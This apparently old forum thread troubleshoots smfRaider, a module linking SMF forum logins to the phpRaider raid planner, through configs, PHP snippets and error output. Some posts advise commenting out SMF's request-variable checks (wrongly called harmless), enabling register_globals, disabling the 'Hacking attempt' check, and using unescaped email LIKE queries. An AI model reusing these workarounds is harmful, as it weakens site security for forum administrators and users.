foreach (array_merge(array_keys($_REQUEST), array_keys($_FILES)) as $key)
if (is_numeric($key))
die('Invalid request variable.');

CHANGE

// These keys shouldn't be set...ever.
//if (isset($_REQUEST['GLOBALS']) || isset($_COOKIE['GLOBALS']))
// die('Invalid request variable.');

// Same goes for numeric keys.
//foreach (array_merge(array_keys($_REQUEST), array_keys($_FILES)) as $key)
// if (is_numeric($key))
// die('Invalid request variable.');


SAVE AND CLOSE

This has no security issues, it basically stops the check to see if you have any malformed cookies.. if you would like to read more on this fix there are a few threads over on the simplemachines forums about it.

Thanks for your help Korpus.. Ill have a bit more of a play/test tonight and see how we go.

~Bob

@Optmus - Whats the error your actually getting?


it is not en error it is just not using the cookie feature. every one needs to relog in every time they visit the phpraider


Um, with lack of information.. have you?

1. Have you got $pConfig_authentication = 'smfraider'; in the phpraider/configuration.php
2. Got $SMF_UseSessionCookie = true; in your smfraider
3. got the correct path set in $SMF_PATH = '/home/public_html/SMF/'; (whatever yours is)

Also, have you done some testing to make sure the bridge works in the first place?
What i did was;
a, create a brand new account on your forums
b, click on the 'login' in phpraider and make sure the new account logs in without having to register it.

If yes to all that, post a link to your site so we can have a look.. chances are it will be the data set inside your cookie

~Bob

Finally got cookies working for my combination of SMF/TinyPortal and phpRaider. Turned out to be

smfraider.php, line 77

//Constants SMF members table index
define(_PASSWD_,13);
define(_EMAILADDRESS_,14);
define(_MEMBERNAME_,1);
define(_SALT_,50);


the _SALT_ define was 51, for my members table the field is 50. That resolved the cookie issue.. Now i've got the Invalid request varible issue which looks to have a work around above..

I tracked down the 'Invalid Request Variable' to $_REQUEST. Putting


print_r(array_keys($_REQUEST));
die('I said so');


in QueryString.php to get the output


Array ( [0] => option [1] => task [2] => char_name [3] => race_id [4] => class_id [5] => guild_id [6] => gender_id [7] => char_level [8] => 1 [9] => 2 [10] => 3 [11] => 4 [12] => 5 [13] => 6 [14] => 7 [15] => LaFSMF06 [16] => PHPSESSID )


So, the SMF check for numeric keys in $_REQUEST is the culprit. Gotta get rid of those numeric array keys and all will be fine, as I'm not comfortable commenting out the check.

EDIT:
components/com_characters/characters.php, line 260
Its using attribute_id as the input field name, which is only numeric, thus failing the SMF check.

Kyp I'll look into ways I can pull that information a little more dynamically though I had problems with keys not being exported correctly from SMF.

As for the Invalid Request Variable this is an incompatibility between the core functions of SMF and that of phpRaider. Hopefully Spiffy is reading this and we can work on a way to re-encode the request variables for the next version.

Kyp I'll look into ways I can pull that information a little more dynamically though I had problems with keys not being exported correctly from SMF.

As for the Invalid Request Variable this is an incompatibility between the core functions of SMF and that of phpRaider. Hopefully Spiffy is reading this and we can work on a way to re-encode the request variables for the next version.


I was just about to start a fix, which would be to store the id as the attribute_name with spaces stripped and tweak the forms/queries to use the that as the reference. Would prolly hafta add a field thou.. so mebbe not.. lol

Bottom line is either comment the check out in QueryString.php or delete all the attributes from phpRaider for the time being.

Looks like I may be close to getting it to work, however I am getting Warning: Smarty error: validate: validator id 'username' is not registered. in /home/handsof/public_html/phpRaider/includes/classes/smarty/Smarty.class.php on line 1095

come up following a red error message saying pass/nick etc arent valid.

I appreciate it may be a spiffy thing, however any ideas you may have would be sweet, as I want to unviel this asap and if users dont have to signup to something new they will use it more (am sure I am surrounded by technophobes!)


Okay clear your phpRaider cookies and log into SMF, go back to phpRaider and it should be working fine now *crosses fingers*


Tried on 3 different pc's (2 at home, 1 at college) and still no joy. It really does look to be an issue with smarty - although no idea.

I have configured everything right as far as the sites other admin can see (hes a full on code monkey) and he cant explain this :S

Kyp I'll look into ways I can pull that information a little more dynamically though I had problems with keys not being exported correctly from SMF.

As for the Invalid Request Variable this is an incompatibility between the core functions of SMF and that of phpRaider. Hopefully Spiffy is reading this and we can work on a way to re-encode the request variables for the next version.


I was just about to start a fix, which would be to store the id as the attribute_name with spaces stripped and tweak the forms/queries to use the that as the reference. Would prolly hafta add a field thou.. so mebbe not.. lol

Bottom line is either comment the check out in QueryString.php or delete all the attributes from phpRaider for the time being.


Kyp as we discussed on IRC, this is tested against version 1.1.2 and you did not have that version. Can anyone else with the same problem just give me their SMF version, I have a sneaky suspicion that it may be versions under 1.1.2

Sorry man, I am def. on 1.1.2

SMF File Your Version Current Version
SMF Package SMF 1.1.2 SMF 1.1.2
Sources 1.1.2 1.1.2

~Bob

@WalkonAres

Can you confirm you have the bridge installed correctly without using the cookie?

I posted how a few posts ago, but in short;

1. set your $SMF_UseSessionCookie = false; in your smfraider

then;
a, create a brand new account on your forums (brand new email, brand new everything)
b, click on the 'login' in phpraider and make sure the new account logs in without having to register it.

If that fails, then then it would be something to do with your config you have.

~Bob


edit: me neds l2speell and speek engrush good

thanks Bob - i'll give that a go soonish today and post what occurs here.

Korpus: As requested pure vanilla installs of of SMF 1.1.2, phpRaider and smfRaider.

Results in:

Fatal error: Cannot redeclare ssi_shutdown() in /var/www/html/tmp/smf/SSI.php on line 184


A minor tweak to smfraider.php:47 from

include_once($SMF_SETTING); // include the settings

to

include($SMF_SETTING); // include the settings


The cookie works without issue, how ever after installing the game, setting up a guild and attempting to create a character results:

Invalid request variable.


Linux: 2.6
Apache: 2.0.59
MySQL: 5.0.27
PHP: 5.2.0
eAccelerator: 0.9.5
SMF: 1.1.2
phpRaider: RC8
smfRaider: 0.4

Okay Kyp try setting the register_global_variables = on

That is really the only difference I can see between my version and yours (except the php version but that is backwardly compatible anyway)

I am getting the following error when tryingto sign in after configuraiton
"Error with login, likely to be an already used email address: SmfRaider Error Code 2"

It is pretty self explanitory, but why would it say this if I am logging in instead of registering?
I have tested with creating a new user after phpraider was isntalled, and that user can log in, but it appears anyone in the database prior to the phpraider isntall is having this issue.

If you read the FAQ error code 2 is a user is trying to be added (logging in) to the database where the email already exists for another user.

Check do the users that are trying to login already exist within phpRaider but with a different username?

Do you really need multiple accounts with the same email?

RE: Invalid Request Variable

I've tracked it down and can reproduce it on my system, it is caused by having the user fill out attributes when creating a character.

I cannot fix this as it is a core part of Spiffy's forms, either you use no attributes for your characters or I produce core hacks each version (*IF* I can find the issue in Spiffy's code)

Will forward this to spiffy to see what he thinks.

I keep getting the fllowing:


Fatal error: Cannot redeclare ssi_shutdown() (previously declared in /home/.oberrunon/havok/havok-guild.org/SSI.php:193) in /home/.oberrunon/havok/havok-guild.org/SSI.php on line 195

Any ideas?

Sorry I'm away for the next two weeks, so hopefully everyone will be able to resolve issues themselves during that time, feel free to email me and I'll try and sort out answers for people when I get back.

I keep getting the fllowing:


Fatal error: Cannot redeclare ssi_shutdown() (previously declared in /home/.oberrunon/havok/havok-guild.org/SSI.php:193) in /home/.oberrunon/havok/havok-guild.org/SSI.php on line 195

Any ideas?


From my searching at simplemachines.org, this is a very common problem. In the current code there are three calls to include $SMF_SSI. In the pLogin function, there should be a require_once statement and call it only once.

if($SMF_UseSessionCookie) require_once($SMF_SSI);

remove the latter call to include_once a few lines down and make the above change and your golden.

this solution isnt working for me could u upload a changed copy?

error comes up now
Parse error: syntax error, unexpected T_ELSE in /xxx/phpraid/authentication/smfraider.php on line 69

Do any one know if this works with [RC9]?

is this going to be updated for RC10?

ya RC10 came out a little fast :P i still have not had the time to install this 1 :^/

I've not yet installed RC9 or even RC10, so I have to absorb what has changed as I have as much clue as you guys when these things are updated.

So I'll try and take a look as soon as I can (installing and upgrading as we speak anyway)

Okay because I'm so damn good (j/k) I have managed to code version 0.5b which supports RC9/RC10, though please note the 'b' which refers to BETA version.

In an effort to get a working version out quickly this beta version has not received the level of testing I normally perform on a release module, more due to the fact that I am still absorbing the changes introduced by RC9/RC10.

I ask those that have been using the module up to now to report back to me if it works for them or if there are any problems they have with the code they have tried.

If it is important that you have a strictly working version at all times that works with SMF then I advise you not to upgrade to this version or install this on a separate test version of phpraider until I (with other people's help) complete the testing.

Thanks

Should we be editing smf.configure.php or will phpRaider do that for us?

I'm asking this because the example value of SMF_Version in the array makes that array invalid.

Van did changing the example work? I can push the examples into the readme if I need too as long as it works.

I'm too chicken to try now that our guild is fully using phpRaider. lol!

However, I have the day off next Tuesday and no raids are planned for that day so I'll spend time with the 1.0 upgrade and use the latest smfRaider then.

I had little success using smfRaider with phpRaider 1.0.

Strictly by not using cooking authentication, I constantly get an SQL error because the "profile_id" session variable isn't set.

If I turn cookies on, smfRaider doesn't find a lot of functions like loadSession and cleanRequest that are located in smf/Sources/Load.php and smf/Sources/QueryString.php.
Forcing an include_once causes a "Hacking attempt" error generated by the SMF files. I turn that hacking check off, but kept finding more functions that were not found so I gave up.

And for people upgrading and who were using a previous version of smfRaider, you'll get a "authentication has changed" error (or something close to that). You'll have to manually create a configuration_auth.php file. This is an example of mine:


<?php

$pConfig_register_url = '/smf/index.php?action=register';
$auth_method_check = 'smf';

$SMF_GroupName = 'Guild Members';
$SMF_UseGroup = false;
$SMF_UseExtDatabase = false;
$SMF_UseSessionCookie = false;
$SMF_PATH = '/home/content/S/G/a/SGadmin42876/html/smf/';
$SMF_Version = '1.1';

$pConfig_use_login_form = 1;
?>

Strictly by not using cooking authentication, I constantly get an SQL error because the "profile_id" session variable isn't set.


From what I could tell, profile_id is blank if the visitor is a guest (i.e. not authenticated).

I've not installed Gold yet. You're telling me its changed *again* from RC10!?

I don't know. Never tried RC10. I went from RC8 to 1.0.

$pConfig_use_login_form = 1;

Is used by the phpRaider authenication unless you delete that out it might be trying to pull the data from phpRaider

Korpus you might want to change in your smf.configure.php

$pConfig_use_login_form = 2;


Currently

phpBB2 uses $pConfig_use_login_form = 0;
phpRaider uses $pConfig_use_login_form = 1;

$pConfig_use_login_form = 1;

Is used by the phpRaider authenication unless you delete that out it might be trying to pull the data from phpRaider


I'm not using the SMF cookie so I need a way to log into phpRaider, but using the username/password stored in SMF. This is how it worked with all previous versions of smfRaider and I'd like to stick to this until I'm ready to flip the switch. The use of cookies isn't working right yet because of the missing inclusions.

Setting $pConfig_use_login_form to 0 gives me no way to log into phpRaider at all.

phpBB2 uses $pConfig_use_login_form = 0;

I would edit smf.configure.php and change it too

/* SMF Raider
* SMF Authentication module for phpRaider (www.phpraider.com)
* Version: 0.5b (Beta)
* Author: Mark Nash (karazhaneu@gmail.com)
*/
// options for the user to change
// users will have control over these variables
$auth_option = array(
'pConfig_register_url'=>'http://yourwebsite.com/index.php?action=register',
'SMF_GroupName' => 'exact name of the group from SMF that can log in',
'SMF_UseGroup' => false,
'SMF_UseExtDatabase' => false,
'SMF_UseSessionCookie' => false,
'SMF_PATH' => 'directory path from your phpraider install to SMF',
'SMF_Version' => 'version number '1.0' or '1.1' valid inputs only'
);

// hard coded options specific to the login script
// users will not have control over these variables
$auth_default = array(
'pConfig_use_login_form'=>2,
);

Then go change it in the configuration_auth.php so they match, they way future login if this shipped with phpraider will not conflict. I am working on phpBB3 right now and plan on setting it to 'pConfig_use_login_form'=>3,

ah ok i see what you are saying, ok well i will leave my post up incase something changes on Korpus and he getts the session data working again.

Van did changing the example work? I can push the examples into the readme if I need too as long as it works.


Ok, I had a chance to play with it now. Indeed the default example value you set for SMF_Version in smf.configure.php causes an error.

I don't use SMF cookie authentication. For one thing, smf.functions.php needs a define("SMF",1) so SMF doesn't complain of a hack attempt and needs a few more files to be included. At least, that's what I had to do on my end.

But otherwize I got it working like I had with RC8. :)

Van to speed things up over here can you send me a list of what you have changed, I think I've tracked a few things down but if I can compare your changes as well it reduces problems overall.

Cheers.

Toward the top of smf.functions.php, I added:

define('SMF',1);
$SMF_LOAD = $SMF_PATH.'Sources/Load.php';
$SMF_QUERY = $SMF_PATH.'Sources/QueryString.php';

Then in the following "if($SMF_UseSessionCookie)", I added:

if($SMF_UseSessionCookie) require_once($SMF_LOAD);
if($SMF_UseSessionCookie) require_once($SMF_QUERY);


But now I get this error:
Fatal error: Call to undefined function: db_query() in /home/content/S/G/a/SGadmin42876/html/smf/Sources/Load.php on line 1983

So there's a missing context for the SMF code to work.

Actually, I also had to include Sources/Subs.php (that's where db_query is defined).

It's *almost* working now...

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /home/content/S/G/a/SGadmin42876/html/smf/Sources/Subs.php on line 321

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/content/S/G/a/SGadmin42876/html/smf/Sources/Load.php on line 1988

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/content/S/G/a/SGadmin42876/html/smf/Sources/Load.php on line 1989

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /home/content/S/G/a/SGadmin42876/html/smf/Sources/Subs.php on line 321

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/content/S/G/a/SGadmin42876/html/smf/Sources/Load.php on line 1988

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/content/S/G/a/SGadmin42876/html/smf/Sources/Load.php on line 1989

I'm installing smfraider 0.5beta with phpRaider 1.0.1 and getting the following error:

Warning: main(Settings.php) [function.main]: failed to open stream: No such file or directory in /home/domain/public_html/smf_forum/phpRaider/authentication/smf/smf.functions.php on line 11

Fatal error: main() [function.require]: Failed opening required 'Settings.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/domain/public_html/smf_forum/phpRaider/authentication/smf/smf.functions.php on line 11


My smf.configure.php file:

$auth_option = array(
'pConfig_register_url'=>'http://www.domain.com/smf_forum/index.php?action=register',
'SMF_GroupName' => 'member',
'SMF_UseGroup' => true,
'SMF_UseExtDatabase' => true,
'SMF_UseSessionCookie' => true,
'SMF_PATH' => '/home/domain/public_html/smf_forum/',
'SMF_Version' => '1.1'
);

// hard coded options specific to the login script
// users will not have control over these variables
$auth_default = array(
'pConfig_use_login_form'=>2,
);
?>


Could the issue be my directory or sql db set up? I have phpRaider files installed in a subdirectory of my smf forum (home/domain/public_html/smf_forum/phpRaider), with each connected to it's own database. My settings all look correct, but I'm obviously missing something here. Any suggestions?

smf.configure.php is not the right file to edit. Look at configuration_auth.php. the SMF path there is probably incorrect.

Hmm...everything in the configuration_auth.php file looks ok:

<?php
// This file is automatically generated
// Manual edits will break things!
$auth_method_check='smf';

$pConfig_register_url = 'http://www.domain.com/smf_forum/index.php?action=register';
$pConfig_use_login_form = '2';
?>

Not really. You're missing a lot of the variable that are defined in smf.configure.php. That file instructs phpRaider what to ask you and which variables to populate in configuration_auth.php. Right now, the AUTH file is missing most of those variables.

D'oh! It appears that I'm not paying attention to earlier posts.

Thank you!

Just a quick note to say I haven't forgotten this project. Real life plus doing some development work for my guild's website has taken up a majority of my time at the moment :)

All,

did anyone have a look into how this would work with 1.0.2?
I did not manage it but I am php n00b :D

Okay I just installed 1.0.2 so having a look to see if I can solve some of the issues reported now.

Update: Okay looking at 1.0.2 now I will easily be able to make cookie/contextual support for SMF, it will mean though you will be forced to have SMF and PHPRaider on the same domain so the cookies are passed.

Update2: Okay got a working, almost integrated version of SMF 1.1.3 and PHPRaider 1.0.2

Expect a new release later today.

Okay latest version posted working with SMF 1.1.2 / 1.1.3 and PHPRaider 1.0.2

Please make sure you read the installation instructions, there has been a huge change in how I handle the login now and for security reasons you may need to use a fresh install of PHPRaider.

Finally I cannot integrate any further into PHPRaider without the following being added:

Ability to include custom code for the login form and logout link, SMF allows you to call its own login/logout form, so a call to a function in the auth file would be great. Spiffy if you are reading this just check my pForm() funcion in smf.functions.php

Perhaps this could be 'login_form'=>2 or something?
Ability to include custom code at the top of the header.php - Once again this is required to get the values from SMF. Spiffy - please see the code in header.php for my comments


If I get these two things in a future release of PHPRaider then I see no reason why SMF cannot go out as part of the core package, though that is Spiffy's call.

I get the following error when I use your header.php:

Warning: require_once(SSI.php) [function.require-once]: failed to open stream: No such file or directory in <mysmfdir>/raid/header.php on line 3

I have SMF installed in the root of my server, and phpRaider is in rootdir/raid

So it seems that

require_once($smf_root_path.'SSI.php');

is not finding my SMF root dir properly?

*edit* - I installed a clean phpRaider 1.0.2 just before I added the SMF auth, so I'm guessing this is the cause of my problems? I thought the upgrade issue was only related to duplicating user accounts?

That's because you didn't properly specify the path to SMF. Look at "smf_path" in the phpraider_config_auth table. Make sure it's correct.

I have another issue where I'm just not being authenticated. The phpRaider page shows me as not being logged in, but I am in SMF...

I get the following error when I use your header.php:

Warning: require_once(SSI.php) [function.require-once]: failed to open stream: No such file or directory in <mysmfdir>/raid/header.php on line 3

I have SMF installed in the root of my server, and phpRaider is in rootdir/raid

So it seems that

require_once($smf_root_path.'SSI.php');

is not finding my SMF root dir properly?




What's the value of $smf_root_path? I'm guessing that you didn't do a fresh install and its empty (well from the error I can see it is empty) :)

Don't forget while you may have installed your SMF on the root on the fileserver you'll have (to use unix as an example) something like.

/home/web/d/domain.com/user/htdocs/smf/

Which is really where it is installed. I tested this against Spiffy's install process and it is very good at finding the correct path (or most of) to your phpraider install.



That's because you didn't properly specify the path to SMF. Look at "smf_path" in the phpraider_config_auth table. Make sure it's correct.


Van is right, this needs to point exactly at your root of your SMF install, as I mentioned above it is a file path not a URL path.

I have another issue where I'm just not being authenticated. The phpRaider page shows me as not being logged in, but I am in SMF...


Van, where is phpraider installed in relation to SMF? Same domain? is phpraider a sub-directory to SMF?

Did you use the 'allow groups' option, if so double check your user is in a group matching the group ids.

We're still in Beta at the moment so I need to know as much about people's installs as possible so I can check stuff off as working.

www.wowsovguard.com/smf
www.wowsovguard.com/phpraider

They're both from the same domain, but seperate folders. I left the groups requirement blank since I can't login to create a group in phpRaider. :)

Van, it will be likely that your cookie in SMF domain is set to www.wowsovguard.com/smf

So when you go to your phpraider install its 'out of its domain' and therefore will not pass the cookie/session data.

Ninja Edit: Van if you read this before you try the sub-directory trick can you tell me the setting of your 'Enable local storage of cookies' and' subdomain independent cookies' which can be found in the Admin panel > Server Settings > Feature Configuration

Unfortunately SMF gives no way to widen it's cookie domain, there is a php_ini setting to change that but not a lot of virtual hosts will support that command and I don't have it to hand right now (I'll update later when I do)

As a test make an exact copy of your phpraider folder and place it inside your smf one so you have

www.wowsovguard.com/smf
www.wowsovguard.com/smf/phpraider

tell me if that works.

I shall try that... brb

By the way, is that how you have it set up at your end?

Ninja Response!! Both options are off, but I think I get the idea where you're going...

Ninja Response!! Both options are off, but I think I get the idea where you're going...


Okay turn on the subdomain independent cookies as that will match my SMF settings.

I moved phpraider in the smf folder to it's accessible via

www.wowsovguard.com/smf/phpraider

And I turned on subdomain independant cookies. I made sure to logout and remove all cookies. No dice.

I switched the authentication to phpraider so at least I can create an account and turn on the debug mode. So far it's not showing anything that could help you...

Making some progress... It seems that even though I didn't specify a group to test against, the function seems to think so... Investigating.

I have success.

In smf.function, Line 124 or so. I added:

if($group == "") $valid_group = true;

In front of:

if(in_array($group, $user_info['groups'])) $valid_group = true; // user is part of a valid group

The database return a blank value which does give the array a size.

Ninja Edit: The phpraider I have at the root of our domain is working fine now too!

How does this authentication know how which permission level should the user be given?

I'm mostly familiar with your older smfRaider where it was creating a matching username in phpRaider. Seems like it's no longer doing this. Is the user's group membership in SMF matched to the same group in phpRaider to give proper permissions?

Ok... I know you've said this a few times and I guess it didn't click.

The SMF group to test is the actual group id, not the member group name. Now I get it!! :D

The only thing is that everyone seems to be given full admin rights on phpRaider...

Not to step on your shoes or anything Korpus but your code was confusing me. Try this out (see below) and let me know if it works for you. No changes to code whatsoever, just drop the files in the authentication/ folder. Use with a new install or the profile_ids will be all jacked up.

Spiffy, your code works just as good too. But instead of treating everyone like a super user, now everyone is a normal user. :) Well, phpRaider is configured to assign all new users to the normal "Guild Members" group that I created.

So the only thing I'm missing is how to map users from SMF to a higher usergroup in phpRaider. This is the part I'm not sure how it works...

Not to step on your shoes or anything Korpus but your code was confusing me. Try this out (see below) and let me know if it works for you. No changes to code whatsoever, just drop the files in the authentication/ folder. Use with a new install or the profile_ids will be all jacked up.


Spiffy though I've only done some small tests with your code but the call to the SSI that late in the code (i.e. your first call to SSI inside the auth file) will generally result in SSI not returning any context data as a new php session would have been started by PHPRaider by then clearing all the old data.

Additionally it will not check for SMF admin when entering people into the DB or for specific user groups inside of SMF when logging people in.

Unfortunately the logout code does nothing either, IMHO we should be looking to integrate fully into SSI that way if anything changes with SMF then PHPRaider can be as compatiable as possible with all versions of SMF.


I have success.

In smf.function, Line 124 or so. I added:

if($group == "") $valid_group = true;

In front of:

if(in_array($group, $user_info['groups'])) $valid_group = true; // user is part of a valid group

The database return a blank value which does give the array a size.

Ninja Edit: The phpraider I have at the root of our domain is working fine now too!


Excellent, I've patched in a version of your changes, please can you test the file attached to this post at the bottom.


How does this authentication know how which permission level should the user be given?

I'm mostly familiar with your older smfRaider where it was creating a matching username in phpRaider. Seems like it's no longer doing this. Is the user's group membership in SMF matched to the same group in phpRaider to give proper permissions?


The new version basically looks at three things. Firstly is the user logged into SMF (it achieves this from session/cookie data given to it by SMF's SSI.php), if the user is logged in then it checks to see if their membergroup IDs match those in the auth_config (you set these when you install PHPRaider.

Finally if it finds a new user it checks with the SSI.php again to see if the user [is_admin] property (so they are in the Administrator group in SMF) if they are it assigns them to PHPRaider group 1 (which is the superuser group) if not it sets them to whatever you have set for 'default' user group.


So the only thing I'm missing is how to map users from SMF to a higher usergroup in phpRaider. This is the part I'm not sure how it works...


Van there is two parts to my code where people are added.

This bit is triggered if they are an admin (in SMF), notice the use of 'group_id' => 1

if ($context['user']['is_admin'])
{
// nothing returned, create profile first ever login create admin
$sql["INSERT"] = "profile";
$sql["VALUES"] = array(
'profile_id'=>$userdata['user_id'],
'user_email'=>$userdata['user_email'],
'password'=>'',
'group_id'=>1,
'username'=>$userdata['username'],
'join_date'=>time());
$db_raid->set_insert($sql);

$_SESSION['group_id'] = '1';


Then this bit is triggered for everyone who passed the 'group' test but does not yet exist in the database.

} else {
// nothing returned, create profile
$sql["INSERT"] = "profile";
$sql["VALUES"] = array(
'profile_id'=>$userdata['user_id'],
'user_email'=>$userdata['user_email'],
'password'=>'',
'group_id'=>$pConfig['default_group'],
'username'=>$userdata['username'],
'join_date'=>time());
$db_raid->set_insert($sql);

$_SESSION['group_id'] = $pConfig['default_group'];

Unless you make custom code you cannot 'map' users from one usergroup to another with the code I've posted.

I can in theory make some custom code for you though that maps users to their SMF group ID, though it would mean having lots of groups so the ID matches? if you wanted to do that you would replace the pVerify function with:


function pVerify($userdata) {
global $db_raid, $pConfig, $context, $user_info;

// ensure correct table is selected
// sometimes switches with other authentication methods
mysql_select_db($pConfig['db_name']);

$sql["SELECT"] = "*";
$sql["FROM"] = "profile";
$sql["WHERE"] = "user_email like '%{$userdata['user_email']}%'";

$db_raid->set_select($sql);

// if nothing returns we need to create profile
// otherwise they have a profile so let's set their ID
// we'll just use the phpBB user id as the profile ID to simplify things
if(($db_raid->sql_numrows($result) == 0) && $userdata['username'] != 'Anonymous') {

// nothing returned, create profile
$sql["INSERT"] = "profile";
$sql["VALUES"] = array(
'profile_id'=>$userdata['user_id'],
'user_email'=>$userdata['user_email'],
'password'=>'',
'group_id'=>$user_info['groups'][0],
'username'=>$userdata['username'],
'join_date'=>time());
$db_raid->set_insert($sql);

$_SESSION['group_id'] = $user_info['groups'][0];
}
} else {
// profile exists set group
$data = $db_raid->sql_fetchrow($result);
$_SESSION['group_id'] = $data['group_id'];
}
}


(Note this code is untested but should work in theory)

This would assign all new users that had not logged in before to the same groupID as their SMF ID (their first ID), though you may have to do lots of tweaking in the DB to get the groupIDs to match their SMF counterparts.

I see... So for an admin like me, in order to be in group 1 in phpRaider, I have to be a member of both the Administrator group in SMF and the default group defined for smf_auth.

but does not yet exist in the database.

So new users other than the recognised admin will have a profile created in phpRaider? Ahh, I see... :)

I see... So for an admin like me, in order to be in group 1 in phpRaider, I have to be a member of both the Administrator group in SMF and the default group defined for smf_auth.

So if I understand this correctly... Other than the Administrators group, other SMF usergroups are mapped to phpRaid if the names match?


What you should do is when setting the 'allowed' groupIDs include ID1 so that allows for the administrators to log in as well.

So lets say (like my guild) you have three groups in SMF that can access the planner.

Administrator (SMF Admin, ID: 1)
Guild Officer (Custom Membergroup, ID: 10)
Guild Member (Custom membergroup, ID: 11)

So my allowed groups in the config_auth would be "1,10,11"

So when someone logs in, SMFRaider sees they are logged into SMF so they pass, then they see that they are in group 1 so they pass, then it sees that they are an administrator so it flags them into the super_user group in PHPRaider.

Now lets say a guild officer logs in, when it adds him to the DB he is either an admin or he is not, in this case he is not an SMF Admin so he gets added to the default PHPRaider group, this would also happen if a Guild Member logs in.

The check on membergroup ids is purely one for access, it has no further mapping unless you use my code from above.

Got it. I just toyed with it and I see how it works now. Awesome work! :)

EDIT: Nevermind what I just said... I had a second look at your code and it's all clear now.

Got it. I just toyed with it and I see how it works now. Awesome work! :)


Did my modified smf.functions.php work for you Van? If so I'll package a new version up.

Not to step on your shoes or anything Korpus but your code was confusing me. Try this out (see below) and let me know if it works for you. No changes to code whatsoever, just drop the files in the authentication/ folder. Use with a new install or the profile_ids will be all jacked up.


Spiffy though I've only done some small tests with your code but the call to the SSI that late in the code (i.e. your first call to SSI inside the auth file) will generally result in SSI not returning any context data as a new php session would have been started by PHPRaider by then clearing all the old data.

Additionally it will not check for SMF admin when entering people into the DB or for specific user groups inside of SMF when logging people in.

Unfortunately the logout code does nothing either, IMHO we should be looking to integrate fully into SSI that way if anything changes with SMF then PHPRaider can be as compatiable as possible with all versions of SMF.


I have success.

In smf.function, Line 124 or so. I added:

if($group == "") $valid_group = true;

In front of:

if(in_array($group, $user_info['groups'])) $valid_group = true; // user is part of a valid group

The database return a blank value which does give the array a size.

Ninja Edit: The phpraider I have at the root of our domain is working fine now too!


Excellent, I've patched in a version of your changes, please can you test the file attached to this post at the bottom.


How does this authentication know how which permission level should the user be given?

I'm mostly familiar with your older smfRaider where it was creating a matching username in phpRaider. Seems like it's no longer doing this. Is the user's group membership in SMF matched to the same group in phpRaider to give proper permissions?


The new version basically looks at three things. Firstly is the user logged into SMF (it achieves this from session/cookie data given to it by SMF's SSI.php), if the user is logged in then it checks to see if their membergroup IDs match those in the auth_config (you set these when you install PHPRaider.

Finally if it finds a new user it checks with the SSI.php again to see if the user [is_admin] property (so they are in the Administrator group in SMF) if they are it assigns them to PHPRaider group 1 (which is the superuser group) if not it sets them to whatever you have set for 'default' user group.


So the only thing I'm missing is how to map users from SMF to a higher usergroup in phpRaider. This is the part I'm not sure how it works...


Van there is two parts to my code where people are added.

This bit is triggered if they are an admin (in SMF), notice the use of 'group_id' => 1

if ($context['user']['is_admin'])
{
// nothing returned, create profile first ever login create admin
$sql["INSERT"] = "profile";
$sql["VALUES"] = array(
'profile_id'=>$userdata['user_id'],
'user_email'=>$userdata['user_email'],
'password'=>'',
'group_id'=>1,
'username'=>$userdata['username'],
'join_date'=>time());
$db_raid->set_insert($sql);

$_SESSION['group_id'] = '1';


Then this bit is triggered for everyone who passed the 'group' test but does not yet exist in the database.

} else {
// nothing returned, create profile
$sql["INSERT"] = "profile";
$sql["VALUES"] = array(
'profile_id'=>$userdata['user_id'],
'user_email'=>$userdata['user_email'],
'password'=>'',
'group_id'=>$pConfig['default_group'],
'username'=>$userdata['username'],
'join_date'=>time());
$db_raid->set_insert($sql);

$_SESSION['group_id'] = $pConfig['default_group'];

Unless you make custom code you cannot 'map' users from one usergroup to another with the code I've posted.

I can in theory make some custom code for you though that maps users to their SMF group ID, though it would mean having lots of groups so the ID matches? if you wanted to do that you would replace the pVerify function with:


function pVerify($userdata) {
global $db_raid, $pConfig, $context, $user_info;

// ensure correct table is selected
// sometimes switches with other authentication methods
mysql_select_db($pConfig['db_name']);

$sql["SELECT"] = "*";
$sql["FROM"] = "profile";
$sql["WHERE"] = "user_email like '%{$userdata['user_email']}%'";

$db_raid->set_select($sql);

// if nothing returns we need to create profile
// otherwise they have a profile so let's set their ID
// we'll just use the phpBB user id as the profile ID to simplify things
if(($db_raid->sql_numrows($result) == 0) && $userdata['username'] != 'Anonymous') {

// nothing returned, create profile
$sql["INSERT"] = "profile";
$sql["VALUES"] = array(
'profile_id'=>$userdata['user_id'],
'user_email'=>$userdata['user_email'],
'password'=>'',
'group_id'=>$user_info['groups'][0],
'username'=>$userdata['username'],
'join_date'=>time());
$db_raid->set_insert($sql);

$_SESSION['group_id'] = $user_info['groups'][0];
}
} else {
// profile exists set group
$data = $db_raid->sql_fetchrow($result);
$_SESSION['group_id'] = $data['group_id'];
}
}


(Note this code is untested but should work in theory)

This would assign all new users that had not logged in before to the same groupID as their SMF ID (their first ID), though you may have to do lots of tweaking in the DB to get the groupIDs to match their SMF counterparts.


I ran it on my local site just fine. Going to try and make another demo site and tie into the SMF database I use to see how it works.

Working very well. I had a few users coming on without any problems, but it's a slow night tonight. Temperature's too nice outside so nobody's online.

Thanks Korpus and SpiffyJr.

I ran it on my local site just fine. Going to try and make another demo site and tie into the SMF database I use to see how it works.


I'll admit I run a lot of security on my live server and my public prod-server as well. Though I know if it works on those it will work for pretty much everyone else as well :)

I still stand by my argument though that you should let ssi_login() and ssi_logout() (http://docs.simplemachines.org/index.php?topic=789.msg1688#msg1688) handle the sessions rather than your own code, otherwise you need to maintain code with every SMF patch. Therefore as this is an integration we should let the parent user management system (in this case SMF) handle all validations and sessions because that allows for the best security also.

Is it not possible just to add a new parameter to the 'use_login' like 2 or something that would call the pForm function in the auth file instead of displaying the normal PHPRaider logout link and login forms?

all,

thanks for your work on this. I tried to set up a fresh php raider following in the instructions using 1.0b.
1.) I had an error message after I selected SMF auth during installation.php saying unexpected ")" at line 14 in smf.configure.php
I fixed that by going into the file and correcting the syntax in there.
So far so good.
2.) Now I managed to install successfully I would like to login the first time. Made sure that the admin is in the proper group, which in my case is called "namenlose".
When I now click on login I am sent to the proper SMF login page. Once I did that I arrive on my smf doorpage. Not in PHPraider. So I went back to my phpraider page, not logged in. Now I am in an endless loop sending me to the SMF logon page but can not authenticate against phpraider.
I also tried the various smf.function.php being available here, which made no difference to me.
